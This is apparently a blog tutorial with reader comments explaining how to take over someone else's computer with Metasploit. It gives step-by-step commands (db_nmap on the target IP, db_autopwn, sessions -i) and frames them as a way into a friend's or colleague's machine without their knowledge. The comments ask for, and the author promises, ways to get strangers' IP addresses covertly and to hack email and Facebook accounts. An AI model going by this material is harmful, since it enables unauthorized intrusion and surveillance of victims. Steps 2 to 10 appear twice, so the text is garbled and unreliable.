Usually whenever
you are thinking to do some stuff with your friend's computer or maybe your colleague’s
laptop without a physical contact with his/her things that may seem a little
bit impossible.
But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer’s IP address and a few steps which I will shortly guide you through.
But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer’s IP address and a few steps which I will shortly guide you through.
It's really
important and highly recommended to have a basic knowledge about coding
specially on CMD and Linux environments like Red Hat Linux or the other available
distros. Well for this moment I will consider that you have the recommended
skills to do the real hacking, just follow
me up.
1 1.) First you need to
download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit won't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit GUI.
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don't worry, this is normal.
6.) Type db_host to make sure you are connected correctly.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
Watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
Sessions -i ExploitNumber
The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.
2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit won't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit GUI.
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don't worry, this is normal.
6.) Type db_host to make sure you are connected correctly.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
Watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
Sessions -i ExploitNumber
The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.
If you really succeed to hack any computer by just doing these fun and easy steps let us know, share the word with us in the comments section below.
if we have someone ip aderess tell the esiest way to hack it easily...
ReplyDelete@FarisKhan at the first point let's ask ourselves what is HACKING and honestly in a more authentic way we'll notice that hacking is all about controlling other users computer's as well as their other electeronic staffs like mobiles, networks etc.
Deleteso let me answer your question the easiest way to hack a computer remotely and through ip-address is Using NetBIOS, and I will write a tutorial about who that method works keeping in mind that readers having only the basic knowledge will also be able to know how to perform simple and safe hacks, the tutorial will be published comming hours so to get the maximum knowledge plus tools and techniques be in touch with LBR. thanks
how can i get the ip address of someone who lives in another country without asking them
ReplyDelete@Anonymous, SURE YOU CAN THE IP ADDRESS WITHOUT ASKING THE PERSON NO MATTER WHETHER HE/SHE IS NEAR TO YOU OR FAR AWAY FROM YOU ITS SOO EASY AND ON A MOMENT I WILL RECORD A VIDEO COVERING THAT ASPECT AND POST IT ON THE BLOG , JUST BE AROUND.
Deleteis there a possible way to get the ip address of someone who lives in a different country than mine. WITHOUT ASKING HIM/HER !!!!
ReplyDeleteyes it is possible
Delete@Abdulfatah Mohamed, there are so many ways to find out or get someones IP-ADDRESS with out asking him/her, some of those ways need a little much advanced and hacking experiences but the easiest method is to use a free IP fetcher service or tool, and in a moment i will record a video covering that METHOD plus free tips, just be around on LBR and don't miss it,
ReplyDeletecheers.
Hi yusuf, you are so good in all and i am just waiting for your new tutorial. would u like to teach us to hack the email address ?and facebook accounts.. there are many people are doing this thing but we are still waiting for your lesson :( kindly teach us as soon as possible
DeleteHello Mohamed.. i saw your tutorial to get ip address of someone using blasze..
ReplyDeleteBut , can you please tell .what should be selected while installing PostgreSQL ..
I mean is it Remote Server or PostgreSQL 9.3 on Port 5432..I am , a little bit confused here..
how could we enter in someone pc iff we have his or her ip aderess directly
ReplyDeletehelo yousaf bro im seeing some problems
ReplyDeletetel me how to connect to deta base thorugh metasploit and where we write this "db_connect postgres:ThePassYouChose@localhost:5432"